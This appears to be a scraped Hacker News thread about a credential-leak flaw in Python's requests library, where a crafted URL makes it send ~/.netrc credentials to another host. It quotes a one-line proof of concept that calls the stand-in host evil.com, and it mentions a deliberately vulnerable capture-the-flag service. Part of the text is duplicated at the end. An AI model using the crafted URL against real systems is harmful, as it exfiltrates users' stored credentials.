Given that the actual vulnerability seems relatively niche along with it being such a popular library officially maintained by the Python foundation, the scariest line in the advisory is almost certainly:
The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
Daviey 17 hours ago [-]
Well, it's probably just a coincidence, but I literally just spun up a web service that is vulnerable to this: https://isitup.daviey.com/
The code doesn't make any reference to a .netrc, but I happen to have one in ~/.netrc:
It's not ideal that requests automatically slurps credentials from ~/.netrc and leaks them, even when my code never references it. It's possible that the netrc is on the same server from a different application, developer debugging environment, or just forgotten about etc.
First one to grab the flag wins, well, nothing. But have fun. I'll keep it online for a couple of weeks, or until the VC money runs out.
dgl 17 hours ago [-]
Sorry, you have been blocked
You are unable to access daviey.com
Looks like Cloudflare has decided the whole thing is dodgy. Or doesn't like my IP address...
Daviey 16 hours ago [-]
That's really strange... because it seems to be working for some people (already have the first solve). I can't see an issues in CF...
EDIT: I had the security in CF too robust, try now?
17 hours ago [-]
woodruffw 19 hours ago [-]
Another good example of lax URL parsing/parser differentials being problematic.
That being said, I wonder how big the actual impact here is in practice: how many users actually use .netrc? I’ve been using curl and other network tools for well over a decade and I don’t think I’ve ever used .netrc for site credentials.
w7 17 hours ago [-]
I think it may be in use by tools without people being aware.
I decided to check my workstation for it just in case, figuring the file would be empty, or not exist.
Instead it seems to be populated with what seem to be Heroku API and git credentials.
edelbitter 14 hours ago [-]
Well then go check if you are for some reason using any of the other surprise features [1], like honoring the CURL_CA_BUNDLE env variable, or not honoring the PROXIES env variable if REQUEST_METHOD is set.
I have it on my laptop because it's the most convenient way to download datasets from various repositories (e.g. NASA Earth Data).
awoimbee 19 hours ago [-]
That's some horrible url parsing code...
But honestly urllib sucks:
url.hostname doesn't return the port
url.netloc also returns the basic auth part
So you have to f"{u.hostname}:{u.port}"
edelbitter 15 hours ago [-]
Wait till you see the cPython stdlib email parser..
Any programming language these days should ship a decent rfc5234 API in the standard library, so you do not get these kinds of problems in slightly different fashion for each and every library/program.
audiodude 16 hours ago [-]
If you, like me, have never heard of a .netrc file...
>Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call
Instead of having a url parse error it appears to drop the : and use the password:domain format.
dcrazy 20 hours ago [-]
> The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
18 hours ago [-]
lyu07282 20 hours ago [-]
[flagged]
cwillu 19 hours ago [-]
man wget:
--no-netrc
Do not try to obtain credentials from .netrc file. By default .netrc file is searched for credentials in
case none have been passed on command line and authentication is required.
lanyard-textile 20 hours ago [-]
Sounds like a misunderstanding, I’m not reading anything idiotic here — just misinformed.
18 hours ago [-]
Rendered at 16:15:13 GMT+0000 (Coordinated Universal Time) with Vercel.
The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
The code doesn't make any reference to a .netrc, but I happen to have one in ~/.netrc:
It's not ideal that requests automatically slurps credentials from ~/.netrc and leaks them, even when my code never references it. It's possible that the netrc is on the same server from a different application, developer debugging environment, or just forgotten about etc.First one to grab the flag wins, well, nothing. But have fun. I'll keep it online for a couple of weeks, or until the VC money runs out.
EDIT: I had the security in CF too robust, try now?
That being said, I wonder how big the actual impact here is in practice: how many users actually use .netrc? I’ve been using curl and other network tools for well over a decade and I don’t think I’ve ever used .netrc for site credentials.
Instead it seems to be populated with what seem to be Heroku API and git credentials.
1: https://requests.readthedocs.io/en/latest/api/#requests.Sess...
But honestly urllib sucks:
url.hostname doesn't return the port url.netloc also returns the basic auth part So you have to f"{u.hostname}:{u.port}"
Any programming language these days should ship a decent rfc5234 API in the standard library, so you do not get these kinds of problems in slightly different fashion for each and every library/program.
https://everything.curl.dev/usingcurl/netrc.html
(Even if it's a bad idea now, and compromise of it could result in a bad quarter or regulatory action, legacy systems and priorities happen.)
> Push code review advice from @sigmavirus24
The code already had `host = ri.netloc.split(':')[0]` before that.
The actual root issue is urlparse doesn't split the host, user, pass and port and trying to do it manually is very error prone:
Compare this with php:>requests.get('http://example.com:@evil.com/')
>Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call
Instead of having a url parse error it appears to drop the : and use the password:domain format.